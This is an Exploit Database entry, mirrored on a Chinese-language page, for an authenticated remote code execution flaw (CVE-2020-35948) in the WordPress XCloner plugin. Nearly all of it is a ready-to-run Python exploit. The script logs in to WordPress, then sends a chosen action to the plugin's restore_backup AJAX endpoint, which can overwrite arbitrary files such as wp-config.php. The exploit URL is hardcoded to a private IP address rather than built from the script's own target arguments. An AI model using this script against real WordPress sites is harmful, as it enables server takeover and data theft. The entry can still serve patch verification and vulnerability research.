WordPress Plugin XCloner 4.2.12 – Remote Code Execution (Authenticated)

• Exploit Database
• 115 阅读

• 作者： Ron Jost
  日期： 2021-07-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50077/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122

  # Exploit Title: WordPress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated) # Date 30.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://www.xcloner.com/ # Software Link: https://downloads.wordpress.org/plugin/xcloner-backup-and-restore.4.2.12.zip # Version: 4.2.1 - 4.2.12 # Tested on: Ubuntu 18.04 # CVE: CVE-2020-35948 # CWE: CWE-732 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/CVE-2020-35948-Exploit/README.md   ''' Description: An issue was discovered in the XCloner Backup and Restore plugin before 4.2.13 for WordPress. It gave authenticated attackers the ability to modify arbitrary files, including PHP files. Doing so would allow an attacker to achieve remote code execution. The xcloner_restore.php write_file_action could overwrite wp-config.php, for example. Alternatively, an attacker could create an exploit chain to obtain a database dump. '''     ''' Banner: ''' banner = """     ###### # ############################################## # # # # # # ## ## ## ## # # # # ### # # # # # # # # # # # # # # # ### # # # # ##### ########### ####### # ################ ###### ## ##### ## ## # # # # # # # # # ####### # # # # # # # ## ### ## # # # # ### # ##### ######## ####### ### ####### ######## ##### ##### # #####   by @Hacker5preme """ print(banner)     ''' Import required modules: ''' import requests import argparse     ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin XCloner RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ajax_cmd = input('[*] Ajax Command to execute: ')   ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'   # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' }   # Body: body = { 'log':username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' }   # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header= auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit()     ''' Exploit: ''' url_exploit = "http://192.168.0.38:80/wordpress//wp-admin/admin-ajax.php?action=restore_backup"   header = { "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=------------------------08425016980d7357", "Connection": "close" }   # Body: body = "--------------------------08425016980d7357\r\nContent-Disposition: form-data; name=\"xcloner_action\"\r\n\r\n%s\r\n--------------------------08425016980d7357--\r\n" % (ajax_cmd)   exploit = session.post(url_exploit, headers=header, data=body) print('') print(exploit.text) print('')